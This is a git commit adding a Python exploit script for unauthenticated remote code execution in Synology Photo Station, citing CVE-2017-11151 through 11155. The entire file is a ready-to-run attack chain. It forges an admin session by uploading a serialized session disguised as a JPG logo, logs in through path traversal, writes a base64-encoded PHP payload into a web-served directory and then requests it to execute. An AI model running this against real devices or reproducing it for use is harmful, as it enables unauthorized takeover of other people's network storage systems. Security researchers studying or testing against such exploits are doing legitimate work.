Synology Photo Station Unauthenticated RCE

AV1080p · web-flow · commit 08d3da451b4c · 2017-09-27T03:22:07.000+08:00
CVE-2017-11151 CVE-2017-11152 CVE-2017-11153 CVE-2017-11154 CVE-2017-11155 https://blogs.securiteam.com/index.php/archives/3356
diff --git a/Synology.py b/Synology.py
@@ -0,0 +1,42 @@
+import requests
+
+# What server you want to attack
+synology_ip = 'http://192.168.1.100'
+
+# Your current IP
+ip = '192.168.1.200'
+
+# PHP code you want to execute
+php_to_execute = '<?php echo system("id"); ?>'
+
+encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
+
+print "[+] Set fake admin sesssion"
+file = [('file', ('foo.jpg', encoded_session))]
+
+r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
+print r.text
+
+print "[+] Login as fake admin"
+
+# Depends on version it might be stored in different dirs
+payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
+# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
+
+try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
+
+whichact = {'action' : 'get_setting'}
+r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
+print r.text
+
+print "[+] Upload php file"
+
+c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
+r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
+print r.text
+
+
+print "[+] Execute payload"
+f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
+
+print f.text
